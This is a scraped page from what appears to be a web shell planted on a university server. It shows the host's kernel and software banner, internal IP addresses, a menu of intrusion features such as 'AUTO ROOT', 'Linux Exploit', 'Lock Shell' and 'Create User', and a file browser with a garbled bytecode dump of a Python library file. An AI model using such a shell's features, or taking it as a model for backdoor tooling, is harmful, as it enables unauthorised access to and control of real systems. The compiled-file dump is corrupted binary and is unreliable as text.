Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
xdg /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
BaseDirectory.cpython-310.pyc
5.19
KB
-rw-r--r--
Config.cpython-310.pyc
1.16
KB
-rw-r--r--
DesktopEntry.cpython-310.pyc
16.02
KB
-rw-r--r--
Exceptions.cpython-310.pyc
3.43
KB
-rw-r--r--
IconTheme.cpython-310.pyc
12.58
KB
-rw-r--r--
IniFile.cpython-310.pyc
9.45
KB
-rw-r--r--
__init__.cpython-310.pyc
1.64
KB
-rw-r--r--
Locale.cpython-310.pyc
1.58
KB
-rw-r--r--
Menu.cpython-310.pyc
27.83
KB
-rw-r--r--
MenuEditor.cpython-310.pyc
13.41
KB
-rw-r--r--
Mime.cpython-310.pyc
22.68
KB
-rw-r--r--
RecentFiles.cpython-310.pyc
5.39
KB
-rw-r--r--
util.cpython-310.pyc
1.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RecentFiles.cpython-310.pyc
o '8�_* � @ sX d Z ddlZddlZddlZddlZddlZddlmZ G dd� d�Z G dd� d�Z dS )zo Implementation of the XDG Recent File Storage Specification http://standards.freedesktop.org/recent-file-spec � N)�ParsingErrorc @ sT e Zd Zdd� Zddd�Zdd� Zddd �Zddd�Zddd�Zdd� Z dd� Z dS )�RecentFilesc C s g | _ d| _d S )N� )r �filename��self� r �1/usr/lib/python3/dist-packages/xdg/RecentFiles.py�__init__ s zRecentFiles.__init__Nc C s� |st j�t �d�d�}z tjj�|�}W n ty! t d|�� tj jjy/ t d|��w || _ |jD ]'}|jtjjjkr]|jdkr]|jD ]}|jtjjjkr\|jdkr\| �|� qHq6| �� dS )ziParse a list of recently used files. filename defaults to ``~/.recently-used``. �HOMEz.recently-used�File not foundzNot a valid .menu filer � RecentItemN)�os�path�join�getenv�xml�dom�minidom�parse�IOErrorr �parsers�expat� ExpatErrorr � childNodes�nodeType�Node�ELEMENT_NODE�tagName�_RecentFiles__parseRecentItem�sort)r r �doc�child�recentr r r r s&